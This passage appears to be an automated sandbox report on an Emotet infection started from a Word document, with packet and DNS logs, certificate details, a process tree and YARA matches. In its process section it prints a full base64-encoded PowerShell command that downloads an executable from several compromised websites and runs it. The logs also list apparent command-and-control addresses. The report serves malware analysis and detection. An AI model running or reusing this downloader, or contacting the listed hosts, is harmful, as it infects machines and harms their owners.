                Sep 20, 2019 13:30:09.216762066 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216779947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216799021 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216816902 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.222572088 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.222759962 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.223519087 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.323061943 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323107004 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323168993 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323267937 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323271990 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.323402882 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323489904 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323515892 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.323590040 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323682070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323682070 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.325934887 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326009035 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.326276064 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326363087 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326630116 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.326782942 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326916933 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326998949 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.327080965 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.327156067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.327514887 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.329025984 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329108000 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329210997 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329289913 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.329354048 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329428911 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329509974 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329535961 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.329652071 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329745054 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.329807997 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.330962896 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.331078053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.331166983 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.331248999 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.331260920 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.331361055 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.331461906 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.331489086 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.331566095 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.331659079 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.332880974 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.336910009 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.337017059 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.337235928 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.342113018 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.342195034 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.342343092 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.348118067 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.348160982 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.348277092 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.348475933 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.348786116 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.348843098 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.348939896 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349010944 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.349036932 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349144936 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349206924 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.349245071 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349351883 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349442005 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349450111 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.349560976 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349652052 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349690914 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.349759102 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349839926 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.349864960 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.349968910 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.350076914 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.350079060 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.350167990 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.350239992 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.350312948 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.350356102 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.350487947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.350519896 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.351738930 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.448889971 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.448951006 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.448971987 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449060917 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449160099 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449188948 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.449374914 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449449062 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449491024 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449568987 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449593067 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.449665070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449779987 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449807882 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.449873924 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.449947119 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.449981928 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.451287985 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.451349974 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.451569080 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.451934099 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.452960968 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.453033924 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.453130960 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.453145027 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.453248978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.453346968 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.453356981 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.453457117 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.453507900 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.454662085 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.454754114 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.454857111 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.456470013 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.456562996 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.456619978 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.456713915 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.456794024 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.456906080 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.456908941 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.456991911 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.457139015 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.457869053 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.458340883 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.458415985 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.458522081 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.458549023 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.458657026 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.458738089 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.458838940 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.458843946 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.460325956 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.462601900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.462646008 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.462735891 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.462764978 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.462862968 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.462963104 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.463006020 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.463114023 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.463176966 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.463253975 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.467879057 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.467938900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.468067884 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.474091053 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474165916 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474251986 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474284887 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.474421024 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474550009 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.474596024 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474684000 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474817991 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.474827051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.474927902 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.475028992 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.475050926 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.475178003 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.475286007 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.475363970 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.475471973 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.475621939 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.477231979 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477247000 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.477277994 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477396965 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.477420092 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477490902 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477554083 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.477567911 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477663040 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477770090 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.477786064 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477885962 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477984905 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.477993965 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.480212927 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.575073957 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575108051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575171947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575288057 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575342894 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.575494051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575546980 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575570107 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.575680971 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:10.276510000 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:40.355288982 CEST49164990192.168.1.16149.167.86.174
                Sep 20, 2019 13:30:43.363837004 CEST49164990192.168.1.16149.167.86.174
                Sep 20, 2019 13:30:49.363673925 CEST49164990192.168.1.16149.167.86.174
                Sep 20, 2019 13:31:01.533160925 CEST49165990192.168.1.16149.167.86.174
                Sep 20, 2019 13:31:04.535896063 CEST49165990192.168.1.16149.167.86.174
                Sep 20, 2019 13:31:10.535446882 CEST49165990192.168.1.16149.167.86.174
                Sep 20, 2019 13:31:28.352250099 CEST4916680192.168.1.16181.164.8.25
                Sep 20, 2019 13:31:31.348680019 CEST4916680192.168.1.16181.164.8.25
                Sep 20, 2019 13:31:37.364033937 CEST4916680192.168.1.16181.164.8.25
                Sep 20, 2019 13:31:49.366425991 CEST4916780192.168.1.16181.164.8.25
                Sep 20, 2019 13:31:52.363720894 CEST4916780192.168.1.16181.164.8.25
                Sep 20, 2019 13:31:58.364341974 CEST4916780192.168.1.16181.164.8.25

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 20, 2019 13:30:07.499588966 CEST5366653192.168.1.168.8.8.8
                Sep 20, 2019 13:30:07.538263083 CEST53536668.8.8.8192.168.1.16

                ICMP Packets

                TimestampSource IPDest IPChecksumCodeType
                Sep 20, 2019 13:31:38.471829891 CEST181.164.8.25192.168.1.167c97(Host unreachable)Destination Unreachable

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Sep 20, 2019 13:30:07.499588966 CEST192.168.1.168.8.8.80x9ed2Standard query (0)sabiosdelamor.coA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Sep 20, 2019 13:30:07.538263083 CEST8.8.8.8192.168.1.160x9ed2No error (0)sabiosdelamor.co198.49.65.242A (IP address)IN (0x0001)

                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Sep 20, 2019 13:30:07.831115007 CEST198.49.65.242443192.168.1.1649163CN=sabiosdelamor.co CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SETue Sep 17 02:00:00 CEST 2019 Mon May 18 02:00:00 CEST 2015 Tue May 30 12:48:38 CEST 2000Tue Dec 17 00:59:59 CET 2019 Sun May 18 01:59:59 CEST 2025 Sat May 30 12:48:38 CEST 2020769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SETue May 30 12:48:38 CEST 2000Sat May 30 12:48:38 CEST 2020

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: WINWORD.EXE PID: 3204 Parent PID: 532

                General

                Start time:13:29:24
                Start date:20/09/2019
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase:0x2f3e0000
                File size:1423008 bytes
                MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: powershell.exe PID: 3456 Parent PID: 1720

                General

                Start time:13:29:41
                Start date:20/09/2019
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA
                Imagebase:0x21ae0000
                File size:452608 bytes
                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Chronological Activities

                Analysis Process: 982.exe PID: 3644 Parent PID: 3456

                General

                Start time:13:29:48
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:'C:\Users\user\982.exe'
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Antivirus matches:
                • Detection: 16%, Virustotal, Browse
                Reputation:low

                Chronological Activities

                Analysis Process: 982.exe PID: 3668 Parent PID: 3644

                General

                Start time:13:29:48
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:'C:\Users\user\982.exe'
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Analysis Process: 982.exe PID: 3696 Parent PID: 3668

                General

                Start time:13:29:50
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:--4e722ada
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Analysis Process: 982.exe PID: 3600 Parent PID: 3696

                General

                Start time:13:29:51
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:--4e722ada
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Analysis Process: mscorsvw.exe PID: 3528 Parent PID: 416

                General

                Start time:13:29:53
                Start date:20/09/2019
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                Imagebase:0x1e0000
                File size:107192 bytes
                MD5 hash:BD2AE15EFB47E5215B4D0C59EA00C91A
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: sortedwatched.exe PID: 3732 Parent PID: 416

                General

                Start time:13:29:59
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\sortedwatched.exe
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Analysis Process: sortedwatched.exe PID: 3704 Parent PID: 3732

                General

                Start time:13:29:59
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\sortedwatched.exe
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Chronological Activities

                Analysis Process: sortedwatched.exe PID: 3672 Parent PID: 3704

                General

                Start time:13:30:01
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:--2a75e385
                Imagebase:0x400000
                File size:425472 bytes
